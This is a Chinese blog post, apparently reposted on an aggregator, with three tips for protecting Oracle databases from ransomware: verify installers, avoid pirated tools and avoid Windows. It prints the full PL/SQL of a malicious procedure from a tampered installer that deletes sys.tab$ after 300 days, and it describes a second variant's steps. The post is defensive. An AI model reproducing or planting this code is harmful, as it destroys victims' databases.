数据安全:Oracle数据库避免比特币勒索的3个建议

Posted 数据工人

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了数据安全:Oracle数据库避免比特币勒索的3个建议相关的知识,希望对你有一定的参考价值。

比特币喋喋不休。


我一个朋友腰斩转售了。


但是来自比特币勒索的事件却喧嚣尘上。


许多开源数据库的比特币防范,主要靠关闭端口、注意密码和权限,而Oracle数据库却偏偏与众不同。


其实不太想写这个话题,因为我们已经将比特币病毒检查,加入到了Oracle数据库的巡检列表中了,定期检查都能发现潜在的隐藏着。


不过从月初突然又挂起一阵风,貌似比特币病毒又开始兴风作浪,连甲骨文官网都出来出指南了。


正在暗暗纳闷妖风之间,有两个朋友不约而同的谈起,XX数据库被比特币勒索了!


其实Oracle数据库要防范比特币病毒是如此简单。如果你不照做,那就可能要花大概小几万块人民币请各路大侠帮你解忧了。


大道至简,方法非常之简单:

建议1、永远从Oracle官网下载Oracle数据库安装软件,并检查MD5是否一致(18c开始换成更复杂的sha256sum)


不得不说,这一点,我之前完全没有想到。而正是因为近期这股妖风,几乎中病毒的所有用户,都是灾在这里。


  • https://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

  • https://edelivery.oracle.com


如果这一串和你下载的软件检查的不一致,千万不要安装


传闻,近期的这一波,就是某个集成商提供的Oracle安装介质被人做了手脚。


在prvtsupp.plb文件里多建了一个DBMS_SUPPORT_DBMONITORP存储过程,和一个DBMS_SUPPORT_DBMONITOR触发器,在你数据库运行满300天的时候,会把tab$直接给delete了。


PROCEDURE DBMS_SUPPORT_DBMONITORP IS

DATE1 INT :=10;

BEGIN 

   SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;

   IF (DATE1>=300) THEN 

   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';

   DELETE SYS.TAB$;

   COMMIT;

   EXECUTE IMMEDIATE 'alter system checkpoint';

   END IF;

END;


所以你数据库就不能用了,再启动open就报错ora-600 [16703],



建议2:不要下载盗版的PL/SQL软件或TOAD软件


我不是在呼吁你去买正版,反正你买不买也没人给我钱。


而是这种情况,是Oracle数据库被比特币勒索的最早来源。


这种方式中病毒的表现是类似这样的:


它主要生成这么几个对象:

DBMS_SUPPORT_INTERNAL

DBMS_SYSTEM_INTERNAL

DBMS_CORE_INTERNAL


1. 当数据库创建时间大于1200天之后,开始备份tab$表

2. 删除tab$中除掉owner#为0和38的记录(sys,xdb)

3. 通过SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION清理掉备份信息(v$controlfile_record_section)

5. 再抛出一个前台的和4类似的警告信息


建议3:不要在任何windows平台上安装Oracle数据库!


在我看来,windows就是一个普通的个人操作系统,从来不适合做一个企业级操作系统。


最重要的不是我的感觉/认为,而是,装在windows上,你的Oracle数据库被比特币病毒侵害的可能性要增加99倍的概率(当然,99是我乱说的,就是告诉你概率太高了)!


装在windows上的oracle,除了上面2种危险外,他直接把数据库软件安装目录里的文件也给你加密了。


这还不是最惨的,毕竟你换个机器装个软件就好了,就跟前面2种一样了。


最惨的是,某个开发商把一些配置文件也放在文件里了,通常这个文件是没有备份的,那问题就要严重得多了。这些数据你可以不要么?



想要数据安全,远离Oracle比特币病毒,严格遵循上述3个建议就好了。



当然,数据安全远不止比特币病毒这么一个点。


今天看到群里转发的银保监会的一则通告截图:




我也不知道具体是哪家银行。


作为一个技术布道者,讲究的是有一说一。在跟每个客户沟通的时候,我反复会强调,我是保健医生,不是江湖郎中。别指望你得了癌症,我一定能妙手回春。所以你需要在基础架构上做投入,在人员、流程上做投入,这样,我们能一起将你的风险降到最低。


这则通知,让我觉得最无趣的是最后一行“监管部门自2016年开始,已多次通报.....该行董事会、高管层履职不力.......”


如果真是这样,真的为这家银行的IT部门感到悲哀!你们就只能静静的背锅吧!



无独有偶,我上周某个晚上,也被领导加到某个故障处理群,没有备份,没有高可用........


对不起,我不是药神,也不是江湖郎中,我只是个保健医生!我能做的,就是点点滴滴,告诉你隐患在哪里,需要大家一起解决,而不是指望我能妙手回春!


比特币病毒也一样!


希望你的数据都平平安安!



更多阅读:

是错的



以上是关于数据安全:Oracle数据库避免比特币勒索的3个建议的主要内容,如果未能解决你的问题,请参考以下文章

这打车App麻烦了!遭黑客勒索巨额比特币

比特币勒索反思:硬件隔离带来的安全感是纸老虎

47%的MongoDB数据库遭***比特币勒索,你中招了吗?中招怎么办?

网络安全之认识挖矿木马

敲诈勒索比特币不断,企业用户如何防“山寨”钓鱼邮件

比特币病毒事件是否证明中国网络安全不堪一击?